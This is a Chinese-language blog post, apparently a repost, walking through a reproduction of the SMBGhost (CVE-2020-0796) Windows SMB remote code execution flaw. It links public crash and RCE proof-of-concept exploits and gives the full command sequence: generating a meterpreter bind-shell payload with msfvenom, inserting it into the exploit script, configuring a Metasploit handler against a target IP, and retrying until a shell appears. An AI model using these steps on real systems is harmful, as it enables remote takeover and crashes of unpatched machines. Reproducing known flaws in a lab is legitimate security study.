CVE-2020-0796 SMB遠程代碼執行漏洞復現


前言:

  這個windows的永恆之黑漏洞,不得不復現一下啦!

  這個漏洞諸多大佬都已經復現了,現在跟隨大佬的腳步,逐個復現一下:

  可參考:https://www.adminxe.com/1220.html

下面是漏洞復現:

  檢測poc:

    使用奇安信的檢測工具,檢測得比較准確

    http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

    

 

  藍屏exp:

    https://github.com/insightglacier/SMBGhost_Crash_Poc/blob/master/gistfile1.py

  該插件需要安裝impactet.git

git clone https://github.com/SecureAuthCorp/impacket.git

cd impacket

sudo python3 setup.py install

  流程:

         

 

        

  遠程代碼執行exp:

    https://github.com/chompie1337/SMBGhost_RCE_PoC

  流程:

    首先,在kali中執行:

msfvenom -p windows/x64/meterpreter/bind_tcp lport=7777 -f py -o exp.py

    然后會生成一個exp.py

    打開exp.py,把其中的內容全部復制,粘貼到exploit.py中的USER_PAYLOAD區域中去,注意,把buf替換成USER_PAYLOAD,保存

      

    在kali中打開msfconsole,進行監聽:

use exploit/multi/handler 
set payload windows/x64/meterpreter/bind_tcp
set lport 7777
set rhost 192.168.28.192 (目標ip)
run

    

    運行exploit.py腳本:

python3 exploit.py -ip 192.168.28.192

    該腳本雖說是遠程代碼執行腳本,但有可能導致目標ip死機,藍屏,重啟等后果。也有可能目標主機不受到任何影響。

    如果出現physical read primitive failed,則多次嘗試執行exploit.py幾次,就會成功了,這個exp是有一定概率的。

    

    在msfconsole中,看到有shell出現:

    如果沒反應,則使用Ctrl+C中斷連接,再次run一次。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM